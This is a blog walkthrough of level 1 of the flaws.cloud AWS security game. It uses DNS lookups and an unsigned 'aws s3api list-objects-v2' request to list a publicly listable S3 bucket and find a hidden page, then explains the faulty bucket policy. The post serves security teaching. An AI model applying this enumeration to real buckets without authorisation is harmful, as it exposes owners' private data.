flaws.cloud - Level 1

6 minute read Published:

flAWS.cloud is a set of CTF-like challenges that teach you common security issues in AWS accounts. This post is the first of a series of walkthroughs for these challenges. It's basically a short writeup on how to solve level 1, followed by a brief explanation of the AWS configuration that leads to this flaw and how to mitigate it. Before reading, go [here](http://flaws.cloud/) and try yourself first! ;)
Table of Contents

Adoption of cloud computing is rising rapidly. Studies predict it will soon surpass on-premises hosting also for enterprise workloads. Large corporates are hesitant mostly due to security concerns, which are partly of more general nature (“uploading data to the cloud”), but also due to the myriad of cloud security failures you read about every day in the news. For example, many companies misconfigure AWS S3 bucket permissions and leave sensitive data unprotected. Indeed, given the complexity of cloud platforms such as AWS or Azure, it is very easy to get some configurations wrong and produce significant security risks.

flaws.cloud is a CTF-like AWS security game teaching you about the most common misconfiguration issues encountered these days. It is brought to you by Scott Piper of summitroute, an AWS security consultant. The game is about breaking into a real AWS account by exploiting badly crafted account permissions. It has 6 levels, the first of which is described in this post. The game is highly educative and recommended for anyone hosting workloads on AWS.

How the game works

To start the game, just go to http://flaws.cloud/ and follow the instructions. The game provides hints for each level, with the last one being a link to the next level. Thus you can always just read and not do anything.

Note that the game is only about misconfiguration issues. There is no need to bring in the big guns. Moreover, AWS has an acceptable use policy that does not cover typical penetration testing activities. For security testing of this kind, you must fill out a form first to get approval. In this game, only use AWS in the “intended” way!

As a prerequisite, you should have the AWS CLI installed, as it will be needed interact with the AWS API. Instructions for installation are here. For later levels, you should also have your own AWS account, which you can to sign up for here

Level 1

Discovering S3 and the region

The description says the level is “buckets of fun” and that we are looking for a subdomain, presumably of “flaws.cloud”. Your first reaction might be to turn to tools like amass to enumerate. But let’s stick with low-tech for now and check some basic things. To find out which IP address is behind http://flaws.cloud, we can use the command line tool “dig”:

 $ dig flaws.cloud
...
;; ANSWER SECTION:
flaws.cloud.            5       IN      A       54.231.184.239
...

This reveals “54.231.184.239” as the IP address of the server. Visiting http://54.231.184.239 in the browser redirects to the AWS S3 landing page. This suggests that flaws.cloud is hosted as a static S3 homepage. Now doing a reverse lookup, we can find out more about this server:

 $ dig -x 54.231.184.239
...
;; ANSWER SECTION:
239.184.231.54.in-addr.arpa. 898 IN     PTR     s3-website-us-west-2.amazonaws.com.
...

The IP belongs to the domain “s3-website-us-west-2.amazonaws.com”, which means the page appears to be hosted as a static website on S3 in region “us-west-2”, which is region US West (Oregon). AWS is divided into different regions, which are groups of data centers in different parts of the world. Most of the resources and products are scoped on these regions and to interact with them, you have to know this region. Check here for an more info on regions.

Exploiting directory listing

Next, we could try to find out more about this page. A common misconfiguration for web servers is directory listing. For an AWS S3 static site, this could happen if unauthenticated users are granted permissions to list a bucket. This may reveal sensitive content, like the link to the next level.

To list a bucket, we have to know not only in which region it is, but also its name. According to AWS documentation, the bucket name for a static website has to be the same as the domain that is used for this site. Thus, the bucket name for flaws.cloud must be “flaws.cloud”.

Region and bucket name are enough to list the bucket. We use the AWS command line client for it. To make an unauthenticated request, use the flag “–no-sign-request”.

 $ aws s3api list-objects-v2 --bucket flaws.cloud --region us-west-2 --no-sign-request
{
    "Contents": [
        ...
        {
            "Key": "index.html",
            "LastModified": "2018-07-10T16:47:16.000Z",
            "ETag": "\"ddd133aef0f381cf0440d5f09648791d\"",
            "Size": 3082,
            "StorageClass": "STANDARD"
        },
        ...
        {
            "Key": "secret-dd02c7c.html",
            "LastModified": "2017-02-27T01:59:30.000Z",
            "ETag": "\"c5e83d744b4736664ac8375d4464ed4c\"",
            "Size": 1051,
            "StorageClass": "STANDARD"
        }
    ]
}

The listing returned a JSON representation of all the objects inn this bucket. Among the files, we find “index.html”, which is the homepage itself. We also find “secret-dd02c7c.html”, which is an HTML document not linked to in the main page. Making a direct request to http://flaws.cloud/secret-dd02c7c.html, we find a link to the next level.

Alternatively, a simple browser request to http://flaws.cloud.s3.amazonaws.com/ would have been enough to get an XML listing of the objects in the bucket.

The flaw

With the level done, let’s look into what went wrong when configuring the bucket. In S3, you can specify something called a bucket policy, which is what defines who can do what with objects in this bucket and also with the bucket itself. For a static website, you have to set a policy like this:

{
  "Version":"2012-10-17",
  "Statement":[{
      "Sid":"PublicReadGetObject",
      "Effect":"Allow",
      "Principal": "*",
      "Action":["s3:GetObject"],
      "Resource":["arn:aws:s3:::flaws.cloud/*"]
    }
  ]
}

I assume you have no background in AWS Policies, so let me briefly describe what the one above means. A policy (in this case) is a list of statements granting the rights to perform actions on resources to principals. By default, nothing is allowed and all actions have to be whitelisted using statements. In the example, we have only a single statement, which allows anyone (principal “*") to get objects (action “s3:GetObject”) out of the flaws.cloud S3 bucket (resource “arn:aws:s3:::flaws.cloud/*”, asterisk matches any resource inside the bucket). Accordingly, nothing else would be allowed, including listing objects.

Now, the bucket “flaws.cloud” is likely configured somewhat like this:

{
  "Version":"2012-10-17",
  "Statement":[{
      "Sid":"PublicReadGetObject",
      "Effect":"Allow",
      "Principal": "*",
      "Action":["s3:GetObject"],
      "Resource":["arn:aws:s3:::flaws.cloud/*"]
  }, {
      "Sid": "PublicListBucket",
      "Effect": "Allow",
      "Principal": "*",
      "Action": ["s3:ListBucket"],
      "Resource": ["arn:aws:s3:::flaws.cloud"]
  }]
}

Here, we have added an additional statement allowing anyone to perform action “s3:ListBucket” on the flaws.cloud bucket. This was what allowed us to list all files and find the secret page.

Conclusion

IAM policies are complicated to understand and hard to get right. Swiss-army-knife services like S3 support a wide variety of use cases, among them websites hosting, log file storage, powering a HDFS-like file system for big data analysis, and many more. To support all this, flexible access management is a requirement, but with that flexibility comes the danger of getting the details wrong.

In recent years, the news are full of articles about data breaches due to S3 misconfiguration. See here for a list of breaches. This level demonstrated how easy it is for anyone on the internet to find and abuse these issues.